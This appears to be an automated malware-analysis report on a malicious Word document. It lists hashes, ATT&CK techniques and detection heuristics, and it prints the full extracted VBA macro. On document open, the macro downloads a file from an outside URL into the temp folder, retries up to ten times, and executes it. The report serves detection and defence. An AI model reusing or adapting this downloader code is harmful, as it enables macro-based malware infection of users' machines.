Office (OOXML) malware analysis — malicious · 5ea8f2bc47e41360

MALICIOUS

Office (OOXML)

301.5 KB Created: 2019-04-18 08:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-08-10

MD5: f602fa284a88acb77ddcfa000b2c640f SHA-1: e08bd5f56a250c1b343f2b8d367b26b011bd69e4 SHA-256: 5ea8f2bc47e41360d21cf7f3ec82ea0d61d70edf486dd295f02e80ff5735326c

198 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes upon opening the document. This macro, named 'Document_Open', calls a function 'glisse' which in turn attempts to download a file using URLDownloadToFile from the URL 'https://colichneryzapparite.info/vchdnw9.tmp' and saves it to '%TEMP%\aws.css'. The script then attempts to execute this downloaded file. This indicates a downloader or droppper functionality.

Heuristics 7

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Sub str2()
    Call Shell(spth(3))
End Sub
```

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Private Sub Document_Open()
    glisse
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Function spth2() As String
    spth2 = Environ(tmp) + "\aws.css"
End Function
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://colichneryzapparite.info/vchdnw9.tmp Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2706 bytes
SHA-256: `35107f4dc68b6632ea134081caa513f5b9b9f7a4167e926dacfd24baae4c8487`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() glisse End Sub Attribute VB_Name = "Page1" Public repeatCount As Integer Sub glisse() fileSize = 0 repeatCount = 0 start: On Error Resume Next dwn fileSize = FileLen(spth(3)) On Error GoTo 0 If fileSize = 0 Then If repeatCount < 10 Then repeatCount = repeatCount + 1 GoTo start End If Else If IsNull(spth(3)) = False Then str 2, spth(3) End If End If End Sub Function spth2() As String spth2 = Environ(tmp) + "\aws.css" End Function Function tmp() As String If IsArray(123) = False Then tmp = Replace("tqqweqqwmqqwp", "qqw", "") End If End Function Attribute VB_Name = "Page2" Function str(var1, var2) Select Case var1 Case 1 MsgBox "gertfvgdgdfg" Case 2 If IsArray(var1) = False Then str2 End If Case 3 MsgBox "ertdecxg" Case Else MsgBox "erfhg45terfgdg" End Select End Function Function spth(var1) As String Select Case var1 Case 1 MsgBox "dffgjh4fdg" Case 2 MsgBox "reue44fdfg" Case 3 spth = spth2 Case Else MsgBox "rtjh34r5gdfg" End Select End Function Function url(var1) As String If var1 = 1 Then url = "https://colichneryzapparite.info/vchdnw9.tmp" End If End Function Attribute VB_Name = "Page3" #If VBA7 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, ByVal szFileName As String, _ ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long #Else Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, ByVal szFileName As String, _ ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long #End If Function dwn() Dim var1 As Integer var1 = 111 If var1 = 111 Then URLDownloadToFile 0, url(1), spth(3), 0, 0 End If End Function Sub str2() Call Shell(spth(3)) End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	17920 bytes
SHA-256: `a25cd5fda04e2bc5eea51feb46aca155d5260f97be946df63ea98cd09e501c87`

Open this report in the interactive analyzer, or submit your own file for analysis.